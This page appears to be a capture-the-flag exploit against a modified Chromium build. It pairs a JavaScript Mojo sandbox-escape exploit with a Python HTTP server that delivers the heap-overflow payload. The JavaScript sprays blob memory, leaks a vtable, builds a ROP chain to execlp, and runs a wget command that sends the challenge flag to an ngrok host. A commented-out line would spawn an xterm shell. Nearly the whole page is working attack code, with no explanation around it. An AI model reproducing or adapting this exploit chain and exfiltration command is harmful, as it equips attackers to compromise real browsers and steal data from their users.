<script src="template/public/mojojs/gen/third_party/blink/public/mojom/blob/data_element.mojom.js"></script>
<script src="template/public/mojojs/gen/third_party/blink/public/mojom/blob/blob.mojom.js"></script>
<script>
async function send(data) {
await fetch(window.location.href + "/" + data["method"], {
method: "POST",
headers: { "Content-Type": "application/json" },
body: JSON.stringify(data),
});
}
async function log(msg) {
await send({ method: "log", msg });
console.log(msg);
}
async function config(len, payload) {
await send({ method: "config", len, payload });
}
let blob_registry_ptr = new blink.mojom.BlobRegistryPtr();
Mojo.bindInterface(
blink.mojom.BlobRegistry.name,
mojo.makeRequest(blob_registry_ptr).handle,
"process"
);
async function getBlob(store, data) {
function Impl() {}
Impl.prototype = {
requestAsReply: async (a, b) => {
return {
data: [1],
};
},
requestAsStream: () => log("hi2"),
requestAsFile: () => log("hi3"),
};
let bytes_provider = new mojo.Binding(
blink.mojom.BytesProvider,
new Impl()
);
let bytes_provider_ptr = new blink.mojom.BytesProviderPtr();
bytes_provider.bind(mojo.makeRequest(bytes_provider_ptr));
let blob_ptr = new blink.mojom.BlobPtr();
let blob_req = mojo.makeRequest(blob_ptr);
if (typeof data === "string") {
data = new TextEncoder().encode(data);
// console.log(data.constructor.name);
}
let data_element = new blink.mojom.DataElement();
data_element.bytes = new blink.mojom.DataElementBytes();
data_element.bytes.length = data.length;
data_element.bytes.embeddedData = data;
data_element.bytes.data = bytes_provider_ptr;
let r = await blob_registry_ptr.register(
blob_req,
Math.random().toString(),
"text/data",
"text/data",
[data_element]
);
store.push(blob_ptr);
return blob_ptr;
}
async function readBlob(blob_ptr, offset, length) {
let readpipe = Mojo.createDataPipe({
elementNumBytes: 1,
capacityNumBytes: length,
});
blob_ptr.readRange(offset, length, readpipe.producer, null);
let buf = await new Promise((resolve) => {
let watcher = readpipe.consumer.watch(
{ readable: true },
(r) => {
let result = new ArrayBuffer(length);
let a = readpipe.consumer.readData(result);
watcher.cancel();
resolve(result.slice(0, a.numBytes));
}
);
});
return new Uint8Array(buf);
}
function flat(size, data) {
let buf = new ArrayBuffer(size);
for (let [offset, n] of Object.entries(data)) {
new BigUint64Array(buf, offset, 1)[0] = BigInt(n);
}
return new Uint8Array(buf, 0, size);
}
function u64(buf) {
return new BigUint64Array(
buf.buffer,
buf.byteOffset,
buf.byteLength / 8
);
}
function u8(buf) {
return new Uint8Array(
buf.buffer,
buf.byteOffset,
buf.byteLength
);
}
function hex(n) {
return `0x${n.toString(16)}`;
}
const global_blobs = [];
(async () => {
let ptr = new blink.mojom.OtterBrokerServicePtr();
Mojo.bindInterface(
blink.mojom.OtterBrokerService.name,
mojo.makeRequest(ptr).handle
);
ptr.init(window.location.hostname);
await log("starting");
let spray = 200;
for (let i = 0; i < spray; i++) {
await getBlob(global_blobs, "R".repeat(0x1000));
await readBlob(global_blobs[i], 0, 8);
}
let command =
'wget "https://999b-2600-1700-9e31-5f0-00-3a.ngrok-free.app/hello/"$(cat /challenge/flag-*)';
// 'echo hiiiii && xterm -hold -e "{ echo cowsay moo; cat; } | /bin/sh"\0';
let strings = new Array(30);
let other = "B".repeat(0x370);
for (let i = 0; i < strings.length; i++) {
strings[i] = new TextEncoder().encode(
"LES-AMATEURS-" +
i.toString(16).padStart(2, "0") +
"Z".repeat(0x1000 - 15)
);
}
for (let i = 0; i < strings.length; i++) {
await getBlob(global_blobs, strings[i]);
}
await log("done making blobs");
let start = spray + 10;
global_blobs[start + 2].ptr.reset();
global_blobs[start + 3].ptr.reset();
global_blobs[start + 0].ptr.reset();
await readBlob(await getBlob(global_blobs, other), 0, 8);
let payload = flat(0x380 + 0x380 + 0x60, {
0x370: 0x0dd0fecaefbeadden,
0x378: 0x1eab11ba05f03713n,
0x388: 1,
0x3d8: 0,
0x6f0: 0x0dd0fecaefbeadden,
0x6f8: 0x1eab11ba05f03713n,
0x708: 1,
0x758: 0x87654321,
});
let encoded = new TextEncoder().encode(command);
for (let i = 0; i < encoded.length; i++) {
payload[0x380 + i] = encoded[i];
}
await config(0x370, payload);
global_blobs[start + 1].ptr.reset();
await ptr.getSlot();
let idx = spray + strings.length;
let target = global_blobs[idx];
await log("/found target");
let view = u64(await readBlob(target, 0, 0x800));
await log("hi" + view[(0x380 + 0x68) / 8]);
await log(`sizeof(self) = ${hex(view[(0x380 + 0x58) / 8])}`);
let self = view[(0x380 + 0x60) / 8];
let vtable = view[0x700 / 8];
let base = vtable - 0x117ded70n;
let xchg = base + 0x0b3aec75n;
let syscall = base + 0x0c0853c7n;
let rax = base + 0x0efff686n;
let rdi = base + 0x1152db1bn;
let rsi = base + 0x1150ce1cn;
let rdx = base + 0x1147a146n;
let rcx = base + 0x1150cbfan;
let r8 = base + 0x0efff673n;
let r9 = base + 0x1020d557n;
let execvp = base + 0x1152e5d0n;
let execlp = base + 0x1152dea0n;
let sh = base + 0x26681f5n;
let tac = base + 0x12616een;
let cmd = self;
// await log(`self = ${hex(self)}`);
// await log(`vtable = ${hex(vtable)}`);
// await log(`base = ${hex(base)}`);
// await log(`xchg gadget = ${hex(xchg)}`);
let fake_vtable = u64(new Uint8Array(0x370));
let r = 0;
fake_vtable[r++] = rax;
fake_vtable[r++] = xchg;
fake_vtable[r++] = rdi;
fake_vtable[r++] = sh;
fake_vtable[r++] = rsi;
fake_vtable[r++] = sh;
fake_vtable[r++] = rdx;
fake_vtable[r++] = tac;
fake_vtable[r++] = rcx;
fake_vtable[r++] = cmd;
fake_vtable[r++] = r8;
fake_vtable[r++] = 0n;
fake_vtable[r++] = execlp;
await readBlob(
await getBlob(global_blobs, "Z".repeat(0x1000)),
0,
8
);
await readBlob(
await getBlob(global_blobs, "Z".repeat(0x1000)),
0,
8
);
global_blobs[start + 6].ptr.reset();
global_blobs[start + 7].ptr.reset();
global_blobs[start + 8].ptr.reset();
await readBlob(
await getBlob(global_blobs, u8(fake_vtable)),
0,
8
);
let fake_addr = undefined;
for (let i = 0; i < 0x380 * 10; i += 0x380) {
let leak = u64(await readBlob(target, i, 0x10));
if (leak[1] == xchg) {
fake_addr = self + BigInt(i);
// await log(`found payload at ${hex(fake_addr)}`);
// await log(`diff = ${hex(fake_addr - self)}`);
break;
}
}
if (fake_addr === undefined) {
// await log(`failed to find payload`);
return;
}
await config(
0x370,
flat(0x380 + 0x80, {
0x000: 0x4545454545454545n,
0x008: 0x4545454545454545n,
0x010: 0x4545454545454545n,
0x018: 0x4545454545454545n,
0x370: 0x0dd0fecaefbeadden,
0x378: 0x1eab11ba05f03713n,
0x380: fake_addr,
0x388: 1,
0x310: 0x424242,
0x318: 0x434343,
})
);
global_blobs[start + 11].ptr.reset();
await ptr.getSlot();
global_blobs[start + 12].ptr.reset();
await log("done");
while (1) {}
})();
</script>
</head>
</html>
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer as HTTPServer
import json
from base64 import b64decode
dummy_len = 0
payload = b""
class Handler(SimpleHTTPRequestHandler):
protocol_version = "HTTP/1.1"
def do_GET(self):
# print("handling get request")
super().do_GET()
def config(self, req):
global dummy_len, payload
dummy_len = req["len"]
payload = bytes(req["payload"].values())
print(f"len = {dummy_len:#x}")
self.send_header("Content-Length", "0")
self.end_headers()
def log(self, req):
print(req["msg"])
self.send_header("Content-Length", "0")
self.end_headers()
def overflow(self, req):
print("sending payload")
print(f"dummy len = {dummy_len:#x}, actual len = {len(payload):#x}")
self.send_header("Transfer-Encoding", "chunked")
self.send_header("Content-Length", str(dummy_len))
self.end_headers()
body: bytes = b""
body += f"{len(payload):x}\r\n".encode()
body += payload
body += b"\r\n"
body += b"0\r\n\r\n\r\n"
# print(body)
self.wfile.write(body)
def do_POST(self):
print("reading length")
contentlen = int(self.headers.get("Content-Length"))
print(contentlen)
data = self.rfile.read(contentlen)
# print(data)
req = json.loads(data)
method = req["method"]
self.send_response(200)
self.send_header("Access-Control-Allow-Origin", "*")
print(method)
match method:
case "config":
self.config(req)
case "log":
self.log(req)
case "getSlot":
self.overflow(req)
case _:
print(f"unknown method: {method}")
# def log_request(self, code = "-", size = "-"):
# return
server = HTTPServer(("0.0.0.0", 80), Handler)
server.serve_forever()
#
related reading#
chromium exploitation#
mojo blob internals#
partition alloc